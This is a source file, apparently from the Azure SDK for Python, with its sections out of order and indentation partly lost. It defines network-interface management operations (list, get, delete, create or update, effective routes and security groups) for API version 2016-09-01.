            request = self._client.get(url, query_parameters, header_parameters)
        return request

    def extract_data(pipeline_response):
        # Deserialize one page into (next page link, iterator of elements).
        deserialized = self._deserialize('NetworkInterfaceListResult', pipeline_response)
        list_of_elem = deserialized.value
        if cls:
            list_of_elem = cls(list_of_elem)
        return deserialized.next_link or None, iter(list_of_elem)

    def get_next(next_link=None):
        # Fetch one page, mapping HTTP errors to typed exceptions.
        request = prepare_request(next_link)

        pipeline_response = self._client._pipeline.run(request, stream=False, **kwargs)
        response = pipeline_response.http_response

        if response.status_code not in [200]:
            map_error(status_code=response.status_code, response=response, error_map=error_map)
            raise HttpResponseError(response=response, error_format=ARMErrorFormat)

        return pipeline_response

    return ItemPaged(
        get_next, extract_data
    )
list_virtual_machine_scale_set_network_interfaces.metadata = {'url': '/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/microsoft.Compute/virtualMachineScaleSets/{virtualMachineScaleSetName}/networkInterfaces'}  # type: ignore
def get_virtual_machine_scale_set_network_interface(
    self,
    resource_group_name,  # type: str
    virtual_machine_scale_set_name,  # type: str
    virtualmachine_index,  # type: str
    network_interface_name,  # type: str
    expand=None,  # type: Optional[str]
    **kwargs  # type: Any
):
    # type: (...) -> "models.NetworkInterface"
    """Get the specified network interface in a virtual machine scale set.

    :param resource_group_name: The name of the resource group.
    :type resource_group_name: str
    :param virtual_machine_scale_set_name: The name of the virtual machine scale set.
    :type virtual_machine_scale_set_name: str
    :param virtualmachine_index: The virtual machine index.
    :type virtualmachine_index: str
    :param network_interface_name: The name of the network interface.
    :type network_interface_name: str
    :param expand: Expands referenced resources.
    :type expand: str
    :keyword callable cls: A custom type or function that will be passed the direct response
    :return: NetworkInterface, or the result of cls(response)
    :rtype: ~azure.mgmt.network.v2016_09_01.models.NetworkInterface
    :raises: ~azure.core.exceptions.HttpResponseError
    """
    cls = kwargs.pop('cls', None)  # type: ClsType["models.NetworkInterface"]
    # Caller-supplied 'error_map' entries override these defaults.
    error_map = {
        401: ClientAuthenticationError, 404: ResourceNotFoundError, 409: ResourceExistsError
    }
    error_map.update(kwargs.pop('error_map', {}))
    api_version = "2016-09-01"
    accept = "application/json, text/json"

    # Construct URL
    url = self.get_virtual_machine_scale_set_network_interface.metadata['url']  # type: ignore
    path_format_arguments = {
        'resourceGroupName': self._serialize.url("resource_group_name", resource_group_name, 'str'),
        'virtualMachineScaleSetName': self._serialize.url("virtual_machine_scale_set_name", virtual_machine_scale_set_name, 'str'),
        'virtualmachineIndex': self._serialize.url("virtualmachine_index", virtualmachine_index, 'str'),
        'networkInterfaceName': self._serialize.url("network_interface_name", network_interface_name, 'str'),
        'subscriptionId': self._serialize.url("self._config.subscription_id", self._config.subscription_id, 'str'),
    }
    url = self._client.format_url(url, **path_format_arguments)

    # Construct parameters
    query_parameters = {}  # type: Dict[str, Any]
    query_parameters['api-version'] = self._serialize.query("api_version", api_version, 'str')
    # '$expand' is only sent when the caller asked for referenced resources.
    if expand is not None:
        query_parameters['$expand'] = self._serialize.query("expand", expand, 'str')

    # Construct headers
    header_parameters = {}  # type: Dict[str, Any]
    header_parameters['Accept'] = self._serialize.header("accept", accept, 'str')

    request = self._client.get(url, query_parameters, header_parameters)
    pipeline_response = self._client._pipeline.run(request, stream=False, **kwargs)
    response = pipeline_response.http_response

    if response.status_code not in [200]:
        map_error(status_code=response.status_code, response=response, error_map=error_map)
        raise HttpResponseError(response=response, error_format=ARMErrorFormat)

    deserialized = self._deserialize('NetworkInterface', pipeline_response)

    if cls:
        return cls(pipeline_response, deserialized, {})

    return deserialized
get_virtual_machine_scale_set_network_interface.metadata = {'url': '/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/microsoft.Compute/virtualMachineScaleSets/{virtualMachineScaleSetName}/virtualMachines/{virtualmachineIndex}/networkInterfaces/{networkInterfaceName}'}  # type: ignore
def _delete_initial(
self,
resource_group_name, # type: str
network_interface_name, # type: str
**kwargs # type: Any
):
# type: (...) -> None
cls = kwargs.pop('cls', None) # type: ClsType[None]
error_map = {
401: ClientAuthenticationError, 404: ResourceNotFoundError, 409: ResourceExistsError
}
error_map.update(kwargs.pop('error_map', {}))
api_version = "2016-09-01"
# Construct URL
url = self._delete_initial.metadata['url'] # type: ignore
path_format_arguments = {
'resourceGroupName': self._serialize.url("resource_group_name", resource_group_name, 'str'),
'networkInterfaceName': self._serialize.url("network_interface_name", network_interface_name, 'str'),
'subscriptionId': self._serialize.url("self._config.subscription_id", self._config.subscription_id, 'str'),
}
url = self._client.format_url(url, **path_format_arguments)
# Construct parameters
query_parameters = {} # type: Dict[str, Any]
query_parameters['api-version'] = self._serialize.query("api_version", api_version, 'str')
# Construct headers
header_parameters = {} # type: Dict[str, Any]
request = self._client.delete(url, query_parameters, header_parameters)
pipeline_response = self._client._pipeline.run(request, stream=False, **kwargs)
response = pipeline_response.http_response
if response.status_code not in [200, 202, 204]:
map_error(status_code=response.status_code, response=response, error_map=error_map)
raise HttpResponseError(response=response, error_format=ARMErrorFormat)
if cls:
return cls(pipeline_response, None, {})
_delete_initial.metadata = {'url': '/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.Network/networkInterfaces/{networkInterfaceName}'} # type: ignore
    def begin_delete(
        self,
        resource_group_name,  # type: str
        network_interface_name,  # type: str
        **kwargs  # type: Any
    ):
        # type: (...) -> LROPoller[None]
        """Deletes the specified network interface.

        Long-running operation: returns immediately with a poller that tracks
        the delete to completion.

        :param resource_group_name: The name of the resource group.
        :type resource_group_name: str
        :param network_interface_name: The name of the network interface.
        :type network_interface_name: str
        :keyword callable cls: A custom type or function that will be passed the direct response
        :keyword str continuation_token: A continuation token to restart a poller from a saved state.
        :keyword polling: True for ARMPolling, False for no polling, or a
         polling object for personal polling strategy
        :paramtype polling: bool or ~azure.core.polling.PollingMethod
        :keyword int polling_interval: Default waiting time between two polls for LRO operations if no Retry-After header is present.
        :return: An instance of LROPoller that returns either None or the result of cls(response)
        :rtype: ~azure.core.polling.LROPoller[None]
        :raises ~azure.core.exceptions.HttpResponseError:
        """
        polling = kwargs.pop('polling', True)  # type: Union[bool, PollingMethod]
        cls = kwargs.pop('cls', None)  # type: ClsType[None]
        lro_delay = kwargs.pop(
            'polling_interval',
            self._config.polling_interval
        )
        cont_token = kwargs.pop('continuation_token', None)  # type: Optional[str]
        if cont_token is None:
            # Fresh start: issue the initial DELETE.  The lambda cls passes the
            # raw pipeline response through so the poller can read LRO headers.
            raw_result = self._delete_initial(
                resource_group_name=resource_group_name,
                network_interface_name=network_interface_name,
                cls=lambda x,y,z: x,
                **kwargs
            )
        # These were consumed by the initial call; drop them so they are not
        # forwarded to the polling method below.
        kwargs.pop('error_map', None)
        kwargs.pop('content_type', None)
        def get_long_running_output(pipeline_response):
            # Delete produces no body; only invoke the caller's hook, if any.
            if cls:
                return cls(pipeline_response, None, {})
        if polling is True: polling_method = ARMPolling(lro_delay, **kwargs)
        elif polling is False: polling_method = NoPolling()
        else: polling_method = polling
        if cont_token:
            # Rehydrate a poller from a previously saved continuation token.
            return LROPoller.from_continuation_token(
                polling_method=polling_method,
                continuation_token=cont_token,
                client=self._client,
                deserialization_callback=get_long_running_output
            )
        else:
            return LROPoller(self._client, raw_result, get_long_running_output, polling_method)
    begin_delete.metadata = {'url': '/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.Network/networkInterfaces/{networkInterfaceName}'}  # type: ignore
def get(
self,
resource_group_name, # type: str
network_interface_name, # type: str
expand=None, # type: Optional[str]
**kwargs # type: Any
):
# type: (...) -> "models.NetworkInterface"
"""Gets information about the specified network interface.
:param resource_group_name: The name of the resource group.
:type resource_group_name: str
:param network_interface_name: The name of the network interface.
:type network_interface_name: str
:param expand: Expands referenced resources.
:type expand: str
:keyword callable cls: A custom type or function that will be passed the direct response
:return: NetworkInterface, or the result of cls(response)
:rtype: ~azure.mgmt.network.v2016_09_01.models.NetworkInterface
:raises: ~azure.core.exceptions.HttpResponseError
"""
cls = kwargs.pop('cls', None) # type: ClsType["models.NetworkInterface"]
error_map = {
401: ClientAuthenticationError, 404: ResourceNotFoundError, 409: ResourceExistsError
}
error_map.update(kwargs.pop('error_map', {}))
api_version = "2016-09-01"
accept = "application/json, text/json"
# Construct URL
url = self.get.metadata['url'] # type: ignore
path_format_arguments = {
'resourceGroupName': self._serialize.url("resource_group_name", resource_group_name, 'str'),
'networkInterfaceName': self._serialize.url("network_interface_name", network_interface_name, 'str'),
'subscriptionId': self._serialize.url("self._config.subscription_id", self._config.subscription_id, 'str'),
}
url = self._client.format_url(url, **path_format_arguments)
# Construct parameters
query_parameters = {} # type: Dict[str, Any]
query_parameters['api-version'] = self._serialize.query("api_version", api_version, 'str')
if expand is not None:
query_parameters['$expand'] = self._serialize.query("expand", expand, 'str')
# Construct headers
header_parameters = {} # type: Dict[str, Any]
header_parameters['Accept'] = self._serialize.header("accept", accept, 'str')
request = self._client.get(url, query_parameters, header_parameters)
pipeline_response = self._client._pipeline.run(request, stream=False, **kwargs)
response = pipeline_response.http_response
if response.status_code not in [200]:
map_error(status_code=response.status_code, response=response, error_map=error_map)
raise HttpResponseError(response=response, error_format=ARMErrorFormat)
deserialized = self._deserialize('NetworkInterface', pipeline_response)
if cls:
return cls(pipeline_response, deserialized, {})
return deserialized
get.metadata = {'url': '/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.Network/networkInterfaces/{networkInterfaceName}'} # type: ignore
    def _create_or_update_initial(
        self,
        resource_group_name,  # type: str
        network_interface_name,  # type: str
        parameters,  # type: "models.NetworkInterface"
        **kwargs  # type: Any
    ):
        # type: (...) -> "models.NetworkInterface"
        """Send the raw PUT request backing :meth:`begin_create_or_update`.

        Returns the ``NetworkInterface`` deserialized from the 200/201 response;
        polling to completion is the caller's responsibility.
        """
        cls = kwargs.pop('cls', None)  # type: ClsType["models.NetworkInterface"]
        error_map = {
            401: ClientAuthenticationError, 404: ResourceNotFoundError, 409: ResourceExistsError
        }
        error_map.update(kwargs.pop('error_map', {}))
        api_version = "2016-09-01"
        content_type = kwargs.pop("content_type", "application/json")
        accept = "application/json, text/json"
        # Construct URL
        url = self._create_or_update_initial.metadata['url']  # type: ignore
        path_format_arguments = {
            'resourceGroupName': self._serialize.url("resource_group_name", resource_group_name, 'str'),
            'networkInterfaceName': self._serialize.url("network_interface_name", network_interface_name, 'str'),
            'subscriptionId': self._serialize.url("self._config.subscription_id", self._config.subscription_id, 'str'),
        }
        url = self._client.format_url(url, **path_format_arguments)
        # Construct parameters
        query_parameters = {}  # type: Dict[str, Any]
        query_parameters['api-version'] = self._serialize.query("api_version", api_version, 'str')
        # Construct headers
        header_parameters = {}  # type: Dict[str, Any]
        header_parameters['Content-Type'] = self._serialize.header("content_type", content_type, 'str')
        header_parameters['Accept'] = self._serialize.header("accept", accept, 'str')
        # Serialize the model into the request body.
        body_content_kwargs = {}  # type: Dict[str, Any]
        body_content = self._serialize.body(parameters, 'NetworkInterface')
        body_content_kwargs['content'] = body_content
        request = self._client.put(url, query_parameters, header_parameters, **body_content_kwargs)
        pipeline_response = self._client._pipeline.run(request, stream=False, **kwargs)
        response = pipeline_response.http_response
        if response.status_code not in [200, 201]:
            map_error(status_code=response.status_code, response=response, error_map=error_map)
            raise HttpResponseError(response=response, error_format=ARMErrorFormat)
        # 200 (updated) and 201 (created) both carry the resource body.
        if response.status_code == 200:
            deserialized = self._deserialize('NetworkInterface', pipeline_response)
        if response.status_code == 201:
            deserialized = self._deserialize('NetworkInterface', pipeline_response)
        if cls:
            return cls(pipeline_response, deserialized, {})
        return deserialized
    _create_or_update_initial.metadata = {'url': '/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.Network/networkInterfaces/{networkInterfaceName}'}  # type: ignore
    def begin_create_or_update(
        self,
        resource_group_name,  # type: str
        network_interface_name,  # type: str
        parameters,  # type: "models.NetworkInterface"
        **kwargs  # type: Any
    ):
        # type: (...) -> LROPoller["models.NetworkInterface"]
        """Creates or updates a network interface.

        Long-running operation: returns immediately with a poller whose result
        is the created/updated ``NetworkInterface``.

        :param resource_group_name: The name of the resource group.
        :type resource_group_name: str
        :param network_interface_name: The name of the network interface.
        :type network_interface_name: str
        :param parameters: Parameters supplied to the create or update network interface operation.
        :type parameters: ~azure.mgmt.network.v2016_09_01.models.NetworkInterface
        :keyword callable cls: A custom type or function that will be passed the direct response
        :keyword str continuation_token: A continuation token to restart a poller from a saved state.
        :keyword polling: True for ARMPolling, False for no polling, or a
         polling object for personal polling strategy
        :paramtype polling: bool or ~azure.core.polling.PollingMethod
        :keyword int polling_interval: Default waiting time between two polls for LRO operations if no Retry-After header is present.
        :return: An instance of LROPoller that returns either NetworkInterface or the result of cls(response)
        :rtype: ~azure.core.polling.LROPoller[~azure.mgmt.network.v2016_09_01.models.NetworkInterface]
        :raises ~azure.core.exceptions.HttpResponseError:
        """
        polling = kwargs.pop('polling', True)  # type: Union[bool, PollingMethod]
        cls = kwargs.pop('cls', None)  # type: ClsType["models.NetworkInterface"]
        lro_delay = kwargs.pop(
            'polling_interval',
            self._config.polling_interval
        )
        cont_token = kwargs.pop('continuation_token', None)  # type: Optional[str]
        if cont_token is None:
            # Fresh start: issue the initial PUT.  The lambda cls passes the raw
            # pipeline response through so the poller can read LRO headers.
            raw_result = self._create_or_update_initial(
                resource_group_name=resource_group_name,
                network_interface_name=network_interface_name,
                parameters=parameters,
                cls=lambda x,y,z: x,
                **kwargs
            )
        # These were consumed by the initial call; drop them so they are not
        # forwarded to the polling method below.
        kwargs.pop('error_map', None)
        kwargs.pop('content_type', None)
        def get_long_running_output(pipeline_response):
            # Deserialize the final response into the model once polling is done.
            deserialized = self._deserialize('NetworkInterface', pipeline_response)
            if cls:
                return cls(pipeline_response, deserialized, {})
            return deserialized
        if polling is True: polling_method = ARMPolling(lro_delay, **kwargs)
        elif polling is False: polling_method = NoPolling()
        else: polling_method = polling
        if cont_token:
            # Rehydrate a poller from a previously saved continuation token.
            return LROPoller.from_continuation_token(
                polling_method=polling_method,
                continuation_token=cont_token,
                client=self._client,
                deserialization_callback=get_long_running_output
            )
        else:
            return LROPoller(self._client, raw_result, get_long_running_output, polling_method)
    begin_create_or_update.metadata = {'url': '/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.Network/networkInterfaces/{networkInterfaceName}'}  # type: ignore
    def list_all(
        self,
        **kwargs  # type: Any
    ):
        # type: (...) -> Iterable["models.NetworkInterfaceListResult"]
        """Gets all network interfaces in a subscription.

        :keyword callable cls: A custom type or function that will be passed the direct response
        :return: An iterator like instance of either NetworkInterfaceListResult or the result of cls(response)
        :rtype: ~azure.core.paging.ItemPaged[~azure.mgmt.network.v2016_09_01.models.NetworkInterfaceListResult]
        :raises: ~azure.core.exceptions.HttpResponseError
        """
        cls = kwargs.pop('cls', None)  # type: ClsType["models.NetworkInterfaceListResult"]
        error_map = {
            401: ClientAuthenticationError, 404: ResourceNotFoundError, 409: ResourceExistsError
        }
        error_map.update(kwargs.pop('error_map', {}))
        api_version = "2016-09-01"
        accept = "application/json, text/json"
        def prepare_request(next_link=None):
            # Build a page request: the first page uses the parameterized URL
            # template, later pages use the service-provided next_link verbatim.
            # Construct headers
            header_parameters = {}  # type: Dict[str, Any]
            header_parameters['Accept'] = self._serialize.header("accept", accept, 'str')
            if not next_link:
                # Construct URL
                url = self.list_all.metadata['url']  # type: ignore
                path_format_arguments = {
                    'subscriptionId': self._serialize.url("self._config.subscription_id", self._config.subscription_id, 'str'),
                }
                url = self._client.format_url(url, **path_format_arguments)
                # Construct parameters
                query_parameters = {}  # type: Dict[str, Any]
                query_parameters['api-version'] = self._serialize.query("api_version", api_version, 'str')
                request = self._client.get(url, query_parameters, header_parameters)
            else:
                url = next_link
                query_parameters = {}  # type: Dict[str, Any]
                request = self._client.get(url, query_parameters, header_parameters)
            return request
        def extract_data(pipeline_response):
            # Deserialize one page; return (link to next page or None, items).
            deserialized = self._deserialize('NetworkInterfaceListResult', pipeline_response)
            list_of_elem = deserialized.value
            if cls:
                list_of_elem = cls(list_of_elem)
            return deserialized.next_link or None, iter(list_of_elem)
        def get_next(next_link=None):
            # Fetch one page and fail fast on any non-200 status.
            request = prepare_request(next_link)
            pipeline_response = self._client._pipeline.run(request, stream=False, **kwargs)
            response = pipeline_response.http_response
            if response.status_code not in [200]:
                map_error(status_code=response.status_code, response=response, error_map=error_map)
                raise HttpResponseError(response=response, error_format=ARMErrorFormat)
            return pipeline_response
        return ItemPaged(
            get_next, extract_data
        )
    list_all.metadata = {'url': '/subscriptions/{subscriptionId}/providers/Microsoft.Network/networkInterfaces'}  # type: ignore
    def list(
        self,
        resource_group_name,  # type: str
        **kwargs  # type: Any
    ):
        # type: (...) -> Iterable["models.NetworkInterfaceListResult"]
        """Gets all network interfaces in a resource group.

        :param resource_group_name: The name of the resource group.
        :type resource_group_name: str
        :keyword callable cls: A custom type or function that will be passed the direct response
        :return: An iterator like instance of either NetworkInterfaceListResult or the result of cls(response)
        :rtype: ~azure.core.paging.ItemPaged[~azure.mgmt.network.v2016_09_01.models.NetworkInterfaceListResult]
        :raises: ~azure.core.exceptions.HttpResponseError
        """
        cls = kwargs.pop('cls', None)  # type: ClsType["models.NetworkInterfaceListResult"]
        error_map = {
            401: ClientAuthenticationError, 404: ResourceNotFoundError, 409: ResourceExistsError
        }
        error_map.update(kwargs.pop('error_map', {}))
        api_version = "2016-09-01"
        accept = "application/json, text/json"
        def prepare_request(next_link=None):
            # Build a page request: the first page uses the parameterized URL
            # template, later pages use the service-provided next_link verbatim.
            # Construct headers
            header_parameters = {}  # type: Dict[str, Any]
            header_parameters['Accept'] = self._serialize.header("accept", accept, 'str')
            if not next_link:
                # Construct URL
                url = self.list.metadata['url']  # type: ignore
                path_format_arguments = {
                    'resourceGroupName': self._serialize.url("resource_group_name", resource_group_name, 'str'),
                    'subscriptionId': self._serialize.url("self._config.subscription_id", self._config.subscription_id, 'str'),
                }
                url = self._client.format_url(url, **path_format_arguments)
                # Construct parameters
                query_parameters = {}  # type: Dict[str, Any]
                query_parameters['api-version'] = self._serialize.query("api_version", api_version, 'str')
                request = self._client.get(url, query_parameters, header_parameters)
            else:
                url = next_link
                query_parameters = {}  # type: Dict[str, Any]
                request = self._client.get(url, query_parameters, header_parameters)
            return request
        def extract_data(pipeline_response):
            # Deserialize one page; return (link to next page or None, items).
            deserialized = self._deserialize('NetworkInterfaceListResult', pipeline_response)
            list_of_elem = deserialized.value
            if cls:
                list_of_elem = cls(list_of_elem)
            return deserialized.next_link or None, iter(list_of_elem)
        def get_next(next_link=None):
            # Fetch one page and fail fast on any non-200 status.
            request = prepare_request(next_link)
            pipeline_response = self._client._pipeline.run(request, stream=False, **kwargs)
            response = pipeline_response.http_response
            if response.status_code not in [200]:
                map_error(status_code=response.status_code, response=response, error_map=error_map)
                raise HttpResponseError(response=response, error_format=ARMErrorFormat)
            return pipeline_response
        return ItemPaged(
            get_next, extract_data
        )
    list.metadata = {'url': '/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.Network/networkInterfaces'}  # type: ignore
    def _get_effective_route_table_initial(
        self,
        resource_group_name,  # type: str
        network_interface_name,  # type: str
        **kwargs  # type: Any
    ):
        # type: (...) -> Optional["models.EffectiveRouteListResult"]
        """Send the raw POST request backing :meth:`begin_get_effective_route_table`.

        Returns the deserialized result on 200, or ``None`` on 202 (operation
        still in progress); polling to completion is the caller's responsibility.
        """
        cls = kwargs.pop('cls', None)  # type: ClsType[Optional["models.EffectiveRouteListResult"]]
        error_map = {
            401: ClientAuthenticationError, 404: ResourceNotFoundError, 409: ResourceExistsError
        }
        error_map.update(kwargs.pop('error_map', {}))
        api_version = "2016-09-01"
        accept = "application/json, text/json"
        # Construct URL
        url = self._get_effective_route_table_initial.metadata['url']  # type: ignore
        path_format_arguments = {
            'resourceGroupName': self._serialize.url("resource_group_name", resource_group_name, 'str'),
            'networkInterfaceName': self._serialize.url("network_interface_name", network_interface_name, 'str'),
            'subscriptionId': self._serialize.url("self._config.subscription_id", self._config.subscription_id, 'str'),
        }
        url = self._client.format_url(url, **path_format_arguments)
        # Construct parameters
        query_parameters = {}  # type: Dict[str, Any]
        query_parameters['api-version'] = self._serialize.query("api_version", api_version, 'str')
        # Construct headers
        header_parameters = {}  # type: Dict[str, Any]
        header_parameters['Accept'] = self._serialize.header("accept", accept, 'str')
        request = self._client.post(url, query_parameters, header_parameters)
        pipeline_response = self._client._pipeline.run(request, stream=False, **kwargs)
        response = pipeline_response.http_response
        if response.status_code not in [200, 202]:
            map_error(status_code=response.status_code, response=response, error_map=error_map)
            raise HttpResponseError(response=response, error_format=ARMErrorFormat)
        # Only a 200 carries a body; a 202 means the LRO was merely accepted.
        deserialized = None
        if response.status_code == 200:
            deserialized = self._deserialize('EffectiveRouteListResult', pipeline_response)
        if cls:
            return cls(pipeline_response, deserialized, {})
        return deserialized
    _get_effective_route_table_initial.metadata = {'url': '/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.Network/networkInterfaces/{networkInterfaceName}/effectiveRouteTable'}  # type: ignore
    def begin_get_effective_route_table(
        self,
        resource_group_name,  # type: str
        network_interface_name,  # type: str
        **kwargs  # type: Any
    ):
        # type: (...) -> LROPoller["models.EffectiveRouteListResult"]
        """Gets all route tables applied to a network interface.

        Long-running operation: returns immediately with a poller whose result
        is the ``EffectiveRouteListResult``.

        :param resource_group_name: The name of the resource group.
        :type resource_group_name: str
        :param network_interface_name: The name of the network interface.
        :type network_interface_name: str
        :keyword callable cls: A custom type or function that will be passed the direct response
        :keyword str continuation_token: A continuation token to restart a poller from a saved state.
        :keyword polling: True for ARMPolling, False for no polling, or a
         polling object for personal polling strategy
        :paramtype polling: bool or ~azure.core.polling.PollingMethod
        :keyword int polling_interval: Default waiting time between two polls for LRO operations if no Retry-After header is present.
        :return: An instance of LROPoller that returns either EffectiveRouteListResult or the result of cls(response)
        :rtype: ~azure.core.polling.LROPoller[~azure.mgmt.network.v2016_09_01.models.EffectiveRouteListResult]
        :raises ~azure.core.exceptions.HttpResponseError:
        """
        polling = kwargs.pop('polling', True)  # type: Union[bool, PollingMethod]
        cls = kwargs.pop('cls', None)  # type: ClsType["models.EffectiveRouteListResult"]
        lro_delay = kwargs.pop(
            'polling_interval',
            self._config.polling_interval
        )
        cont_token = kwargs.pop('continuation_token', None)  # type: Optional[str]
        if cont_token is None:
            # Fresh start: issue the initial POST.  The lambda cls passes the raw
            # pipeline response through so the poller can read LRO headers.
            raw_result = self._get_effective_route_table_initial(
                resource_group_name=resource_group_name,
                network_interface_name=network_interface_name,
                cls=lambda x,y,z: x,
                **kwargs
            )
        # These were consumed by the initial call; drop them so they are not
        # forwarded to the polling method below.
        kwargs.pop('error_map', None)
        kwargs.pop('content_type', None)
        def get_long_running_output(pipeline_response):
            # Deserialize the final response into the model once polling is done.
            deserialized = self._deserialize('EffectiveRouteListResult', pipeline_response)
            if cls:
                return cls(pipeline_response, deserialized, {})
            return deserialized
        if polling is True: polling_method = ARMPolling(lro_delay, **kwargs)
        elif polling is False: polling_method = NoPolling()
        else: polling_method = polling
        if cont_token:
            # Rehydrate a poller from a previously saved continuation token.
            return LROPoller.from_continuation_token(
                polling_method=polling_method,
                continuation_token=cont_token,
                client=self._client,
                deserialization_callback=get_long_running_output
            )
        else:
            return LROPoller(self._client, raw_result, get_long_running_output, polling_method)
    begin_get_effective_route_table.metadata = {'url': '/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.Network/networkInterfaces/{networkInterfaceName}/effectiveRouteTable'}  # type: ignore
    def _list_effective_network_security_groups_initial(
        self,
        resource_group_name,  # type: str
        network_interface_name,  # type: str
        **kwargs  # type: Any
    ):
        # type: (...) -> Optional["models.EffectiveNetworkSecurityGroupListResult"]
        """Send the raw POST request backing :meth:`begin_list_effective_network_security_groups`.

        Returns the deserialized result on 200, or ``None`` on 202 (operation
        still in progress); polling to completion is the caller's responsibility.
        """
        cls = kwargs.pop('cls', None)  # type: ClsType[Optional["models.EffectiveNetworkSecurityGroupListResult"]]
        error_map = {
            401: ClientAuthenticationError, 404: ResourceNotFoundError, 409: ResourceExistsError
        }
        error_map.update(kwargs.pop('error_map', {}))
        api_version = "2016-09-01"
        accept = "application/json, text/json"
        # Construct URL
        url = self._list_effective_network_security_groups_initial.metadata['url']  # type: ignore
        path_format_arguments = {
            'resourceGroupName': self._serialize.url("resource_group_name", resource_group_name, 'str'),
            'networkInterfaceName': self._serialize.url("network_interface_name", network_interface_name, 'str'),
            'subscriptionId': self._serialize.url("self._config.subscription_id", self._config.subscription_id, 'str'),
        }
        url = self._client.format_url(url, **path_format_arguments)
        # Construct parameters
        query_parameters = {}  # type: Dict[str, Any]
        query_parameters['api-version'] = self._serialize.query("api_version", api_version, 'str')
        # Construct headers
        header_parameters = {}  # type: Dict[str, Any]
        header_parameters['Accept'] = self._serialize.header("accept", accept, 'str')
        request = self._client.post(url, query_parameters, header_parameters)
        pipeline_response = self._client._pipeline.run(request, stream=False, **kwargs)
        response = pipeline_response.http_response
        if response.status_code not in [200, 202]:
            map_error(status_code=response.status_code, response=response, error_map=error_map)
            raise HttpResponseError(response=response, error_format=ARMErrorFormat)
        # Only a 200 carries a body; a 202 means the LRO was merely accepted.
        deserialized = None
        if response.status_code == 200:
            deserialized = self._deserialize('EffectiveNetworkSecurityGroupListResult', pipeline_response)
        if cls:
            return cls(pipeline_response, deserialized, {})
        return deserialized
    _list_effective_network_security_groups_initial.metadata = {'url': '/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.Network/networkInterfaces/{networkInterfaceName}/effectiveNetworkSecurityGroups'}  # type: ignore
    def begin_list_effective_network_security_groups(
        self,
        resource_group_name,  # type: str
        network_interface_name,  # type: str
        **kwargs  # type: Any
    ):
        # type: (...) -> LROPoller["models.EffectiveNetworkSecurityGroupListResult"]
        """Gets all network security groups applied to a network interface.

        Long-running operation: returns immediately with a poller whose result
        is the ``EffectiveNetworkSecurityGroupListResult``.

        :param resource_group_name: The name of the resource group.
        :type resource_group_name: str
        :param network_interface_name: The name of the network interface.
        :type network_interface_name: str
        :keyword callable cls: A custom type or function that will be passed the direct response
        :keyword str continuation_token: A continuation token to restart a poller from a saved state.
        :keyword polling: True for ARMPolling, False for no polling, or a
         polling object for personal polling strategy
        :paramtype polling: bool or ~azure.core.polling.PollingMethod
        :keyword int polling_interval: Default waiting time between two polls for LRO operations if no Retry-After header is present.
        :return: An instance of LROPoller that returns either EffectiveNetworkSecurityGroupListResult or the result of cls(response)
        :rtype: ~azure.core.polling.LROPoller[~azure.mgmt.network.v2016_09_01.models.EffectiveNetworkSecurityGroupListResult]
        :raises ~azure.core.exceptions.HttpResponseError:
        """
        polling = kwargs.pop('polling', True)  # type: Union[bool, PollingMethod]
        cls = kwargs.pop('cls', None)  # type: ClsType["models.EffectiveNetworkSecurityGroupListResult"]
        lro_delay = kwargs.pop(
            'polling_interval',
            self._config.polling_interval
        )
        cont_token = kwargs.pop('continuation_token', None)  # type: Optional[str]
        if cont_token is None:
            # Fresh start: issue the initial POST.  The lambda cls passes the raw
            # pipeline response through so the poller can read LRO headers.
            raw_result = self._list_effective_network_security_groups_initial(
                resource_group_name=resource_group_name,
                network_interface_name=network_interface_name,
                cls=lambda x,y,z: x,
                **kwargs
            )
        # These were consumed by the initial call; drop them so they are not
        # forwarded to the polling method below.
        kwargs.pop('error_map', None)
        kwargs.pop('content_type', None)
        def get_long_running_output(pipeline_response):
            # Deserialize the final response into the model once polling is done.
            deserialized = self._deserialize('EffectiveNetworkSecurityGroupListResult', pipeline_response)
            if cls:
                return cls(pipeline_response, deserialized, {})
            return deserialized
        if polling is True: polling_method = ARMPolling(lro_delay, **kwargs)
        elif polling is False: polling_method = NoPolling()
        else: polling_method = polling
        if cont_token:
            # Rehydrate a poller from a previously saved continuation token.
            return LROPoller.from_continuation_token(
                polling_method=polling_method,
                continuation_token=cont_token,
                client=self._client,
                deserialization_callback=get_long_running_output
            )
        else:
            return LROPoller(self._client, raw_result, get_long_running_output, polling_method)
    begin_list_effective_network_security_groups.metadata = {'url': '/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.Network/networkInterfaces/{networkInterfaceName}/effectiveNetworkSecurityGroups'}  # type: ignore
| 50.212284 | 316 | 0.668326 |
from typing import TYPE_CHECKING
import warnings
from azure.core.exceptions import ClientAuthenticationError, HttpResponseError, ResourceExistsError, ResourceNotFoundError, map_error
from azure.core.paging import ItemPaged
from azure.core.pipeline import PipelineResponse
from azure.core.pipeline.transport import HttpRequest, HttpResponse
from azure.core.polling import LROPoller, NoPolling, PollingMethod
from azure.mgmt.core.exceptions import ARMErrorFormat
from azure.mgmt.core.polling.arm_polling import ARMPolling
from .. import models
if TYPE_CHECKING:
from typing import Any, Callable, Dict, Generic, Iterable, Optional, TypeVar, Union
T = TypeVar('T')
ClsType = Optional[Callable[[PipelineResponse[HttpRequest, HttpResponse], T, Dict[str, Any]], Any]]
class NetworkInterfacesOperations(object):
models = models
def __init__(self, client, config, serializer, deserializer):
self._client = client
self._serialize = serializer
self._deserialize = deserializer
self._config = config
def list_virtual_machine_scale_set_vm_network_interfaces(
self,
resource_group_name,
virtual_machine_scale_set_name,
virtualmachine_index,
**kwargs
):
cls = kwargs.pop('cls', None)
error_map = {
401: ClientAuthenticationError, 404: ResourceNotFoundError, 409: ResourceExistsError
}
error_map.update(kwargs.pop('error_map', {}))
api_version = "2016-09-01"
accept = "application/json, text/json"
def prepare_request(next_link=None):
